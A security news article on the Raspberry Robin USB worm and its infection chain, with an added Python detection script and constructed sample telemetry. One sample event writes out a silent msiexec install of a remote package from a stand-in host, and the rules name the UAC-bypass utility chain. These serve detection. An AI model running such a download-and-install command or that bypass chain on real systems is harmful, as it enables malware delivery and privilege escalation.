New ‘Raspberry Robin’ Malware Spreading via External Drives
Red Canary researchers, who attribute the malware to an activity cluster they dubbed "Raspberry Robin," found that it "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL."
The earliest indications of the activity are believed to date to September 2021, with the first infections found at organizations connected to the manufacturing and technology sectors.
Attack chains associated with Raspberry Robin begin when an infected USB drive is connected to a Windows machine. The drive carries the worm's payload, an .LNK shortcut file masquerading as a legitimate folder.
The worm then spawns a new process, using cmd.exe to read and execute the malicious file stored on the external drive.
Next, it launches explorer.exe and msiexec.exe; the latter is used to establish external network communication with a rogue domain for command-and-control (C2) purposes and to download and install a DLL library.
The malicious DLL is then loaded and executed through a chain of legitimate Windows utilities (fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe), which effectively bypasses User Account Control (UAC).
Another feature common to Raspberry Robin detections is outbound C2 contact from three processes, regsvr32.exe, rundll32.exe, and dllhost.exe, to IP addresses associated with Tor nodes.
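As an added example (not the researchers' or the article's code), the following Python flags the process and network behaviours described above in constructed sample telemetry; the Tor node set, the event field names and the non-C: drive heuristic are assumptions, not published indicators.

```python
import re
# Constructed placeholder set standing in for a real Tor relay list (assumption).
TOR_NODES = {"198.51.100.7", "203.0.113.42"}
# Parent/child pairs from the UAC-bypass chain the article describes.
UAC_PARENTS = {"fodhelper.exe", "rundll32.exe"}
UAC_CHILDREN = {"rundll32.exe", "odbcconf.exe"}
# Binaries observed making outbound C2 contact to Tor nodes.
TOR_TALKERS = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}
# Heuristic (assumption): a non-C: drive letter in a cmd.exe command line.
REMOVABLE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)

def classify(ev):
    """Return the names of the rules a single process/network event matches."""
    hits = []
    img = ev["image"].lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "")
    if img == "cmd.exe" and REMOVABLE.search(cmd):
        hits.append("cmd_exec_from_removable")
    if img == "msiexec.exe" and re.search(r"https?://", cmd, re.IGNORECASE):
        hits.append("msiexec_remote_package")
    if parent in UAC_PARENTS and img in UAC_CHILDREN:
        hits.append("uac_bypass_chain")
    if img in TOR_TALKERS and ev.get("dst_ip") in TOR_NODES:
        hits.append("lolbin_to_tor")
    return hits

def scan(events):
    """Return (event index, rule name) pairs for every hit across a log."""
    return [(i, h) for i, ev in enumerate(events) for h in classify(ev)]

# Constructed sample telemetry resembling the chain in the article.
SAMPLE_EVENTS = [
    {"image": "explorer.exe", "parent": "userinit.exe", "cmdline": "explorer.exe"},
    {"image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": 'cmd.exe /c "E:\\Photos.lnk"'},
    {"image": "msiexec.exe", "parent": "cmd.exe",
     "cmdline": "msiexec.exe /q /i http://example.invalid/pkg.msi"},
    {"image": "rundll32.exe", "parent": "fodhelper.exe", "cmdline": "rundll32.exe"},
    {"image": "odbcconf.exe", "parent": "rundll32.exe", "cmdline": "odbcconf.exe"},
    {"image": "regsvr32.exe", "parent": "odbcconf.exe", "cmdline": "regsvr32.exe",
     "dst_ip": "198.51.100.7"},
    {"image": "svchost.exe", "parent": "services.exe", "cmdline": "svchost.exe -k netsvcs",
     "dst_ip": "10.0.0.5"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The benign explorer.exe and svchost.exe records produce no hits, so the rules stay quiet on ordinary process activity in this sample.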
However, the operators' goals are not clear at the moment. It is also not clear how or where the external drives are infected, although the infection is believed to take place offline.
“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers claimed. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”